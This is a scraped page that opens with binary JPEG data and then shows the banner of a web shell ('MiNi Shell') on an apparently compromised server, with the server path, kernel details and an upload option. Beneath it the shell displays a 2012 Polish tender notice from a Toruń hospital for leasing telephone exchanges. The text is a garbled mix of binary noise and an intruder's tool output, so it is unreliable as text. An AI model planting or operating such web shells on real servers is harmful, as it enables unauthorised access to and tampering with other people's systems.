JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121228/273383-N-2012.html

<p class="kh_header"><b>Toruń: Dzierżawa dwóch central telefonicznych oraz świadczenie usług serwisowych i administrowania dostarczonego systemu.</b><br>
<b>Numer ogłoszenia: 273383 - 2012; data zamieszczenia: 28.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53-59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6101510, faks 56 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa dwóch central telefonicznych oraz świadczenie usług serwisowych i administrowania dostarczonego systemu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dzierżawa dwóch central telefonicznych (centrala główna w lokalizacji przy ulicy Św. Józefa 53-59 i centrala wyniesiona w lokalizacji przy ulicy Konstytucji 3 Maja 42 w Toruniu) oraz świadczenie usług serwisowych i administrowania dostarczonego systemu.<br>
2. Wymagania techniczne:<br>
I. Centrala lokalizacja ul. Św. Józefa 53-59<br>
A. Pojemność systemu - wymagania ilościowe<br>
1) 496 linii analogowych abonenckich<br>
2) 10 linii analogowych miejskich<br>
3) 8 portów cyfrowych systemowych<br>
4) 1 portów cyfrowych BRI ISDN (2B+D) z sygnalizacją DSS1 do współpracy z siecią publiczną z możliwością rozbudowy do 4 traktów<br>	
5) 2 traktów cyfrowych PRI ISDN z sygnalizacją QSIG do współpracy z innymi systemami z możliwością  rozbudowy do 4 traktów<br>	
6) 50  licencji na obsługę abonentów VoIP SIP<br>
7) 16  kanałów VoIP (obsługa ruchu VoIP - TDM)<br>
8) 3 aparaty systemowe - nr 1<br>	
9) 2 aparaty systemowe - nr 2<br>	
10) Oprogramowanie taryfikacyjne<br>	
11) Urządzenia teletransmisyjne do połączenia traktem dwóch lokalizacji<br>
12) System zapowiedzi słownych<br>	
13) Zasilacz centrali wraz z akumulatorami - 8 godzin podtrzymania.<br>	
14) Instalacja, uruchomienie, 48 miesięczny serwis gwarancyjny.<br>	
B. Doposażenie istniejącego systemu DECT Varix 200 DeTeWe<br>
1) 1 karta PSTM<br>
2) 2 karty UPDTS<br>	
3) 2 stacje bazowe instalowane na zewnątrz<br>
4) 4stacje bazowe instalowane wewnątrz<br>	
5) Okablowanie stacyjne pomiędzy Varix200 a przełącznicą główną<br>
C. Prace do wykonania<br>
1) Montaż dostarczonej centrali wraz z rozszyciem na przełącznicy głównej<br>	
2) Konfiguracja i uruchomienie systemu<br>	
3) Uruchomienie połączenia z sekcją wyniesioną w lokalizacji ul. Konstytucji 3-go Maja	<br>	
4) Podłączenie istniejącej centrali Varix200 DeTeWe do dzierżawionej centrali (konfiguracja po stronie dostarczonej centrali oraz po stronie centrali Varix200)<br>
5) Konfiguracja systemu taryfikacji (prefiksy, stawki)<br>
6) Podłączenie nowej centrali do sieci wewnętrznej klienta<br>	
7) Wykonanie instalacji i podłączenie nowych stacji bazowych do systemu Varix200	tak	
8) Uruchomienie i konfiguracja serwera nagrywania, serwera alarmowania i zapowiedzi IVR<br>	
II. Centrala lokalizacja ul. Konstytucji 3 Maja 42<br>
A. Pojemność systemu - wymagania ilościowe<br>
1) 288 linii analogowych abonenckich<br>	
2) 24 portów cyfrowych systemowych<br>	
3) 1 portów cyfrowych BRI ISDN (2B+D) z sygnalizacją DSS1 do współpracy z siecią publiczną z możliwością  rozbudowy do 4 traktów<br>	
4) 1 traktów cyfrowych PRI ISDN z sygnalizacją QSIG do współpracy z innymi systemami  z możliwością  rozbudowy do 4 traktów<br>	
5) 50 licencji na obsługę abonentów VoIP SIP<br>
6) 16 kanałów VoIP (obsługa ruchu VoIP - TDM)<br>	
7) 20 aparaty systemowe - nr 1<br>	
8) 2 aparaty systemowe - nr 2<br>
9) 2 przystawki rozszerzające do aparatu nr 2 o kolejne min. 40 przycisków.<br>	
10) Oprogramowanie taryfikacyjne<br>
11) Urządzenia teletransmisyjne do połączenia traktem dwóch lokalizacji<br>
12) System zapowiedzi słownych<br>
13) Zasilacz centrali wraz z akumulatorami - 8 godzin podtrzymania.<br>	
14) Instalacja, uruchomienie, 48 miesięczny serwis gwarancyjny<br>	
B. Prace do wykonania<br>
1) Demontaż istniejącej centrali telefonicznej<br>	
2) Montaż dostarczonej centrali wraz z rozszyciem na przełącznicy głównej<br>	
3) Uruchomienie połączenia z modułem głównym w lokalizacji ul. Św. Józefa<br>	
4) Odłączenie istniejącej centrali od sieci wewnętrznej<br>	
5) Podłączenie nowej centrali do sieci wewnętrznej<br>	
6) Wykonanie dokumentacji powykonawczej<br>
III. Obsługa serwisowa<br>
1) Usuwanie awarii urządzeń - czas usunięcia do 2 godzin<br>
2) Usuwanie usterek urządzeń - czas usunięcia do 16 godzin<br>
3) Programowanie funkcji urządzeń - do 48 godzin<br>
4) Wykonywanie szczegółowych bilingów - raz w miesiącu<br>
5) Zmiana aranżacji bazy danych centrali<br>	
6) Obsługa serwerów<br>	
7) Szkolenie z obsługi podstawowych funkcji systemu<br>
8) Pomoc przy kontaktach z operatorami sieci publicznej<br>	
9) Utrzymywanie zdalnego nadzoru nad systemem<br>	
10) Podjęcie natychmiastowych działań w celu usunięcia awarii i usterek po otrzymaniu zgłoszenia od użytkownika<br>
11) Utrzymanie kopii zapasowych oprogramowania i licencji zapewniających prawidłową pracę systemu<br>	
12) Administrowanie systemu<br>	
3. Wymagania ogólne systemowe:<br>
3.1. Dostarczony sprzęt musi być fabrycznie nowy, dotychczas nieużywany, rok produkcji - nie wcześniej niż 2012.<br>
3.2. System musi zapewniać możliwość rozbudowy do pojemności 1000 portów tylko poprzez dołożenie dodatkowych pakietów (kart) bez konieczności dokładania dodatkowych półek, stojaków, modułów funkcjonalnych. Zwiększenie pojemności i funkcjonalności systemu dotyczy zarówno części dotyczącej oprogramowania jak i sprzętu.<br>
3.3.	System musi zostać wyposażony w pełną redundancję elementów zasilających i sterujących (praca w trybie gorącej rezerwy). Elementy redundantne muszą pracować w trybie /gorącej rezerwy/. Awaryjne przełączenie na system rezerwowy nie może powodować przerw w komunikacji, ani utraty danych taryfikacyjnych.<br> 
3.4.	 System musi zapewnić możliwość wymiany modułów w trybie /hot swap/, bez konieczności wyłączenia z eksploatacji całego urządzenia lub jego części.<br>
3.5.	 Sprzęt musi zapewnić automatyczny restart, samoczynne testowanie i automatyczne uruchamiane po włączeniu zasilania lub restarcie manualnym i powrót do normalnej pracy bez konieczności wykonywania dodatkowych czynności przez obsługę.<br>
3.6.	 Ze względów bezpieczeństwa elementy sterowania centralą muszą być wykonane w technologii przestrzenna czasowego pola komutacyjnego (TDM).<br>
3.7.	 System musi współpracować z posiadanymi przez Zamawiającego aparatami systemowymi DGT 3490 w ilości 4 szt. W przypadku braku możliwości współpracy Wykonawca musi dostarczyć odpowiednią ilość nowych aparatów systemowych posiadających nie gorszą funkcjonalność niż posiadane przez Zamawiającego aparaty DGT 3490.<br> 
3.8.	 System zasilania musi zapewniać łączny czas podtrzymania w sytuacjach awaryjnych nie krótszy niż 8 godzin.<br>
3.9.	 Wymagana praca systemu w pomieszczeniu bez klimatyzacji.<br>
4. Wymagania dotyczące sieciowania dwóch obiektów:<br>
4.1.	Obie centrale muszą tworzyć jeden, spójny, autonomiczny system telekomunikacyjny - system zsieciowany.<br> 
4.2.	 Sieciowanie poszczególnych węzłów/modułów musi być możliwe w oparciu o łącza E1 (przy pomocy protokołów DSS1, QSIG). System zsieciowany obejmujący oba obiekty musi cechować się między innymi:<br>
a)	jedną bazą konfiguracyjną i jednym systemem zarządzania,<br>
b)	jednym systemem licencyjnym,<br>
c)	jednym planem numeracyjnym,<br>
d)	możliwością przechodzenia użytkowników pomiędzy centralami, logowaniem się na dowolnych terminalach (numery/konta użytkowników nie mogą być skojarzone na sztywno z łączami),<br>
e)	możliwością budowania rozproszonych układów sekretarsko-dyrektorskich,<br>
f)	możliwością podglądu stanu dowolnego abonenta lub łącza obu central.<br>
5. Wymagania funkcjonalne systemowe:<br>
5.1.	System musi zapewniać automatyczne zestawianie połączeń wewnętrznych, połączeń w ruchu wychodzącym i przychodzącym.<br>
5.2.	Wymagana jest minimum realizacja usług typu:<br>
a)	bezpośrednie wybieranie numeru wewnętrznego (DDI),<br>
b)	przekazywanie połączeń (CT) wraz z funkcją biura zleceń (przekazywanie połączeń zestawionych przez operatora),<br>
c)	przenoszenie wywołań na numer wewnętrzny i zewnętrzny w przypadku zajętości (CFB), braku odpowiedzi (CFNR), bezwarunkowe (CFU), w tym przenoszenie wywołań na pocztę głosową,<br>
d)	zawieszanie połączeń (CH),<br>
e)	połączenie oczekujące (CW),<br>
f)	prezentacja numeru na aparatach cyfrowych, voip i analogowych (FSK),<br>
g)	przechwytywanie połączeń,<br>
h)	połączenia trójstronne (3PTY),<br>
i) 	blokada połączeń przychodzących (DND),<br>
j)	przyjmowanie nowych wywołań w trakcie prowadzenia rozmowy,<br>
k)	połączenia automatyczne typu gorąca linia (HOT LINE) realizowane bezzwłocznie, natychmiast po podniesieniu mikrotelefonu bez konieczności wybierania numeru lub ze zwłoką umożliwiającą wybranie numeru zaraz po podniesieniu mikrotelefonu.<br>
l)	oddzwanianie przy zajętości (usługa CCBS) oraz przy braku odpowiedzi (usługa CCNR) - w przypadku zajętości (braku odpowiedzi) wywoływanego terminala w obrębie systemu abonent może na tle sygnału zajętości (CCBS) oraz na tle zwrotnego sygnału dzwonienia (CCNR) zażądać automatyczne zrealizowanie połączenia przez Serwer Telekomunikacyjny w chwili gdy terminal wywoływany przejdzie w stan spoczynku (CCBS) lub pojawi się jakakolwiek aktywność ze strony wywoływanego terminala (CCNR),<br>
m)	blokowanie połączeń wychodzących z poziomu terminala kodem PIN.<br>
5.3.	 Zestawianie połączeń telekonferencyjnych (dla min. 80 jednoczesnych uczestników):<br>
1) 	automatyczne z listy (programowanie stałych grup telekonferencyjnych) oraz ręczne dobieranie uczestników konferencji wraz z:<br>
a) możliwością wizualizacji optycznej abonentów dołączonych u prowadzącego,<br>
b)	możliwością sterowania mikrofonem uczestnika konferencji przez prowadzącego (np. domyślnie wszyscy uczestnicy jedynie słuchają),<br>
c)	możliwością wysłania do prowadzącego żądania prawa głosu przez uczestnika konferencji,<br>
2) dynamiczne - organizacja konferencji wdzwanianej typu /meet-me/ z podaniem hasła, konferencja jest zamawiana przez dowolnego użytkownika systemu na określonym numerze dostępowym wraz z definiowaniem hasła, możliwość wdzwonienia się do konferencji z zewnątrz (z sieci PSTN/GSM).<br>
5.4.	 Wirtualne logowanie - realizacja połączeń z dowolnego aparatu z wykorzystaniem posiadanych uprawnień (przypisanie opłat taryfikacyjnych na rachunek dokonującego połączenie) - autoryzacja odbywa się poprzez wprowadzenie kodów PIN. Usługa musi umożliwiać zalogowanie się jednokrotne (na czas wykonania 1 połączenia) lub permanentne - do czasu wylogowania się.<br>
5.5.	 Programowe wydzielanie grup abonentów o dowolnej liczebności - na zasadzie podziału firmy na wydziały/jednostki z możliwością wydzielenia zasobów, przypisania odrębnego planu numeracyjnego, kategorii uprawnień i nawet zabronienia dzwonienia po numerach wewnętrznych pomiędzy nimi.<br>
5.6.	 Możliwość kolejkowania połączeń przychodzących dla wydzielonej grupy abonentów.<br>
5.7.	 Tworzenie grup abonentów (min. 10 grup po 30 użytkowników w dowolnej kombinacji abonentów) z automatyczną dystrybucją połączeń w ramach grupy zgodnie z następującymi algorytmami:<br>
a)   najdłużej wolny abonent,<br>
b)	według określonej, z góry zdefiniowanej kolejności,<br>
c)	według poziomu kompetencji,<br>
d)	przekierowanie do innych kolejek lub agentów.<br>
5.8.	 Przechwytywanie połączeń w ramach grupy - w przypadku wywołania na jednym z terminali abonenckich, musi być możliwe przejęcie tego wywołania przez dowolny inny terminal z tej samej grupy.<br>
5.9.	 Możliwość tworzenia grup rozgłaszania (paging) na bazie aparatów systemowych (także VoIP) aranżowane z konsoli dyspozytorskiej - jednoczesne wprowadzanie grupy aparatów w tryb głośnomówiący przez użytkownika posiadającego odpowiednie uprawnienia i rozgłaszanie komunikatów.<br>
5.10. Możliwość zdefiniowania minimum 10 różnych kategorii określających uprawnienia realizacji połączeń wyjściowych nadawanych poszczególnym użytkownikom w systemie (np. blokada połączeń wychodzących, blokada połączeń na komórki, blokada połączeń międzynarodowych itd.)<br>
5.11. Tworzenie układów połączeń sekretarsko-dyrektorskich oraz układów dyspozytorskich<br>
5.12. Monitorowanie stanu linii abonenckich lub łączy za pomocą aparatów wyposażonych w klawisze programowalne z sygnalizacją optyczną lub przystawki z klawiszami programowalnymi z sygnalizacją optyczną.<br>
5.13. /Wejście na trzeciego/ dla uprzywilejowanego abonenta (operatora konsoli dyspozytorskiej) możliwość włączenia się w trwającą rozmowę, i następnie:<br>
a) wycofania się,<br>
b) przeprowadzenia konsultacji (zawieszenie rozmawiającego),<br>
c) przejęcia rozmówcy (odrzucenie rozmawiającego),<br>
d) rozbicia rozmowy (rozłączenie rozmawiających).<br>
5.14. Tworzenie dowolnego planu numeracyjnego, numeracja wewnętrzna od 1 do 8 cyfr, możliwość tworzenia nieciągłej numeracji, połączenia do sieci publicznej przez dowolny prefiks.<br>
5.15. Kierowanie połączeń wychodzących zgodnie z regułą najniższego kosztu - tzw. funkcjonalność LCR (ang. Least Cost Routing).<br>
5.16. Oferowanie na liniach miejskich tonowego wybierania numerów wewnętrznych bez udziału operatora na tle informacyjnej zapowiedzi słownej (tzw. DISA) oraz możliwość blokowania tej funkcji w stosunku do wybranych numerów wewnętrznych.<br>
5.17. Wykrywanie sygnału faksu na liniach miejskich w celu skierowania połączeń na terminale faksowe.<br>
5.18. Zestawienie połączeń pomiędzy abonentami wewnętrznymi i liniami miejskimi z udziałem stanowiska operatora lub bez jego udziału.<br>
5.19. Obsługa standardowych protokołów VoIP - SIP, H.323.<br>
5.20. Obsługa kodeków VoIP co najmniej G711, G729.<br>
5.21. System musi udostępniać interfejs do współpracy z zewnętrznymi aplikacjami typu CTI, wymagana jest minimum obsługa protokołu TAPI.<br>
5.22. Możliwość zastosowania aplikacji CTI producenta systemu umożliwiającej sterowanie połączeniami i usługami - aplikacja musi być instalowana na komputerach użytkowników.<br>
5.23. Wraz z systemem musi być dostępna aplikacja telefonu programowego (tzw. /softphone/) producenta Serwera Telekomunikacyjnego instalowana na komputerach użytkowników umożliwiająca realizowanie połączeń głosowych.<br>
5.24. System musi mieć możliwość doposażenia o moduł (tego samego producenta co Serwer Telekomunikacyjny) integrujący radiowe (łączność radiotelefoniczna analogowa, cyfrowa, DMR, TETRA) i przewodowe środki łączności, zapewniający między innymi zestawianie połączeń pomiędzy telefonami stacjonarnymi, a radiotelefonami oraz integrację usług dyspozytorskich.<br>
5.25. System musi zapewniać ciągłą rejestrację zdarzeń taryfikacyjnych, statystycznych i diagnostycznych - bez możliwości wyłączenia tej funkcji przez administratora.<br>
5.26. System musi zapewniać rejestrację danych o połączeniach wychodzących, przychodzących i tranzytowych, umożliwiających pełną taryfikację połączeń oraz rozliczanie opłat - w tym rozliczanie sekundowe.<br>
5.27. System musi zapewniać rejestrację danych o połączeniach udanych (zrealizowanych) i połączeniach nieudanych.<br>
5.28. System musi posiadać aplikację pozwalającą na analizowanie przebiegów sygnalizacyjnych dla sygnalizacji cyfrowych we wspólnym kanale minimum dla:<br> 
- analiza sygnalizacji dla protokołu DSS1<br> 
- prezentacja wiadomości sygnalizacyjnych warstwy 2-ej i 3-ej zarówno na styku międzywęzłowym PRI jak i na  styku abonenckim BRI.<br>
5.29. System musi przekazywać do stanowiska zarządzania, na bieżąco, informacje o wszystkich alarmach w systemie i inne dane o charakterze statystycznym. System zarządzania musi posiadać interfejs graficzny w języku polskim.<br>
5.30. Konfiguracja systemu musi odbywać się z poziomu dedykowanej, graficznej aplikacji pracującej pod systemami MS Windows 2000/XP/Vista/7. Niedopuszczalne jest używanie do konfiguracji systemu aplikacji wykorzystujących przeglądarki www.<br>
System taryfikacji<br>
1)	System taryfikacji musi posiadać interfejs obsługi w języku polskim oraz realizować niżej wymienione funkcje gromadzenia informacji o połączeniach spełniające wymogi określone w ustawie Prawo Telekomunikacyjne<br>
2)	System musi posiadać funkcję umożliwiającą przekazywanie do systemu zarządzania informacji o stanie pobierania danych taryfikacyjnych.<br>
3)	System musi mieć wbudowany moduł weryfikacji ciągłości danych oraz poprawności bazy danych.<br>
4)	Oprogramowanie musi umożliwiać wykonywanie obliczeń taryfikacyjnych oraz ich wydruk dla:<br>
a)	pojedynczego abonenta fizycznego/wirtualnego,<br>
b)	grupy abonentów fizycznych/wirtualnych,<br>
c)	rozmów zestawianych przez biuro zleceń,<br>
d)	rozmów zestawianych w trybie usług,<br>
e)	wszystkich abonentów modułu fizycznych/wirtualnych,<br>
f)	wszystkich abonentów centrali sieciowej fizycznych/wirtualnych,<br>
g)	danych bilingowych połączeń wychodzących i przychodzących<br>
5)	Kryteria taryfikacji:<br>
a)	zmienna cena za jednostkę rozliczeniową,<br>
b)	zmienna cena za stałą jednostkę czasu,<br>
c)	indywidualnie dobierana jednostka rozliczeniową dla abonenta/grupy,<br>
d)	dowolnie definiowany koszt połączenia dla każdego operatora indywidualnie,<br>
e)	rozliczenia według jednostek rozliczeniowych: jednostka czasowa (również rozliczenia sekundowe) lub jednostka impulsowa,<br>
6)	System taryfikacyjny musi pozwalać na generowanie raportów szczegółowych i skróconych oraz zestawień dla pojedynczego abonenta lub grupy abonentów zawierających koszt w zadanym okresie z rozbiciem na kierunki. Okres objęty raportem musi dać się skonfigurować poprzez podanie początku i końca (data i godzina z dokładnością do 1 sekundy).<br>
7)	System taryfikacyjny musi dawać możliwość zapisywania raportów w postaci plików PDF. W przypadku dużej liczby rekordów zawartych w raporcie, musi istnieć możliwość jego podziału na kilka plików.<br>
8)	System musi udostępniać w trybie on-line w ramach dostarczonego oprogramowania danych taryfikacyjnych na serwerze minimum przez okres 12 miesięcy.<br>
Nagrywanie rozmów<br>
1)	System telekomunikacyjny musi być wyposażony w system nagrywania rozmów spełniający następujące kryteria:<br>
a)	minimum 30 jednocześnie nagrywanych połączeń dla każdej centrali<br>
b)	nagrywanie rozmów przychodzących i wychodzących z centrali<br>
c)	możliwość definiowania przez użytkownika numerów wewnętrznych centrali, którzy mają być nagrywani<br>
d)	system musi zapewniać przechowywanie nagranych rozmów co najmniej 3 lata wstecz<br>
e)	system nagrywania musi być wyposażony w automatyczny backup danych (minimum dwa dyski twarde)<br>
f)	możliwość kopiowania nagrań na zewnętrzny nośnik danych<br>
g)	możliwość eksportu rozmów w postaci plików *.mp3<br>
2)	System nagrywania rozmów musi współpracować z dedykowanym oprogramowaniem o następujących cechach:<br>
a)	program typu desktop (nie poprzez przeglądarkę www) pracujący w środowisku Windows XP/Vista/7<br>
b)	program pracujący w sieci LAN użytkownika - możliwość zainstalowania wielu kopii programu<br>
c)	program musi być wyposażony w mechanizmy autoryzacji użytkowników<br>
d)	możliwość dowolnego filtrowania i wyszukiwania nagrań według podstawowych kryteriów (data, godzina, nr abonenta A, nr abonenta B)<br>
e)	odsłuchiwanie nagranych rozmów<br>
f)	udostępnianie podstawowych informacji o nagraniu<br>
Informowanie o zagrożeniach<br>
1)	System telekomunikacyjny musi udostępniać funkcjonalność  telefonicznego systemu alarmowania:<br>
a)	możliwość definiowania grup numerów telefonicznych powiadamianych w razie wywołania alarmu<br>
b)	możliwość definiowania minimum 20 różnych alarmów<br>
c)	możliwość nagrywania i wysłuchiwania komunikatów alarmowych z poziomu aparatów telefonicznych z wykorzystaniem kodów PIN<br>
d)	minimalna ilość jednocześnie wywoływanych numerów - 60<br>
e)	możliwość kolejkowania alarmów<br>
f)	wyzwolenie wcześniej zdefiniowanego alarmu z poziomu dowolnego aparatu telefonicznego z użyciem  systemu kodów PIN<br>
g)	możliwość zdefiniowana periodycznie wywoływanych alarmów testowych<br> 
h)	potwierdzanie wysłuchania komunikatu alarmowego za pomocą klawiatury telefonu<br>
2)	Program do obsługi systemu alarmowania powinien umożliwiać:<br>
a)	zakładanie, edycję i usuwanie abonentów i grup abonentów podlegających alarmowaniu<br>
b)	definiowanie numerów telefonicznych służących do wyzwalania alarmów i do nagrywania komunikatów<br> 
c)	ustalanie dla każdego abonenta oddzielnie parametrów wywołania<br>
d)	tworzenie i drukowanie raportów z wyzwolonych alarmów<br>
System zapowiedzi słownych z funkcjonalnością IVR<br>
a)	system telekomunikacyjny powinien umożliwiać nagrywanie zapowiedzi słownych oraz tworzenie wielopoziomowego menu<br>
b)	możliwość uruchomienia co najmniej 10 różnych wielopoziomowych menu.<br>
6. Aparaty systemowe - wymagania ogólne:<br>
a)	Cyfrowe aparaty systemowe muszą być tego samego producenta co system telekomunikacyjny.<br>
b)	Aparat systemowy musi być wyposażony w wyświetlacz podający komunikaty w języku polskim (polskie czcionki) i realizować funkcje wymienione w poniższych podpunktach.<br>
c)	Interfejs aparatów systemowych musi umożliwiać pracę na pojedynczej parze przewodów oraz stabilną pracę na linii o długości co najmniej 1 km, przy średnicy przewodu 0,5mm.<br>
d)	Programowalne przyciski muszą umożliwiać monitorowanie stanu abonenta lub łącza.<br>
6.1. Aparat systemowy - nr 1<br>  
a)	Zdalne ładowanie oprogramowania z systemu,<br>
b)	Wyświetlacz graficzny lub LCD - co najmniej 4 linie po 32 znaki każda, polska wersja językowa interfejsu użytkownika,<br>
c)	Wbudowany zestaw głośno mówiący umożliwiający prowadzenie rozmowy przy odłożonej słuchawce,<br>
d)	Możliwość dołączenia zestawu nagłownego,<br>
e)	Funkcja MUTE wyłączenie/uaktywnienie, mikrofonu,<br>
f)	Minimum 20 dowolnie programowalnych przycisków funkcyjnych z optyczną sygnalizacją stanu linii abonenckiej, zdefiniowanie i przypisania do klawisza programowalnego pojedynczego numeru wraz z opisem słownym,<br>
g)	Regulację głośności torów akustycznych (mikrotelefon, układ głośnomówiący, dzwonek),<br>
h)	Lokalna /książka telefoniczna/ na minimum 40 numerów wraz z opisem słownym,<br>
i)	Możliwość dołączania przystawek rozszerzających o min. 30 przycisków programowalnych (łącznie min. 100 przycisków).<br>
j)	Możliwość lokalnego podłączenia rejestratora rozmów.<br>
6.2. Aparat systemowy - nr 2<br> 
a)	Zdalne ładowanie oprogramowania z systemu.<br>
b)	Aparat musi być wyposażony w intefejs systemowy (praca na jednej parze przewodów) oraz interfejs IP/Ethernet,<br> 
c)	Aparat musi być wyposażony w kolorowy wyświetlacz graficzny LCD min. 4,3 cala z rozdzielczością min. 480 x 272, z regulacją konta nachylenia, wyświetlający komunikaty w języku polskim,<br>
d)	Minimum 10 dowolnie programowalnych przycisków funkcyjnych z optyczną sygnalizacją stanu linii abonenckiej, zdefiniowanie i przypisania do klawisza,<br>
e)	Wbudowany zestaw głośno mówiący umożliwiający prowadzenie rozmowy przy odłożonej słuchawce,<br>
f)	Możliwość dołączenia zestawu nagłownego,<br>
g)	Funkcja MUTE wyłączenie/uaktywnienie, mikrofonu,<br>
h)	Regulację głośności torów akustycznych (mikrotelefon, układ głośnomówiący, dzwonek),<br>
i)	Lokalna /książka telefoniczna/ na minimum 40 numerów wraz z opisem słownym,<br>
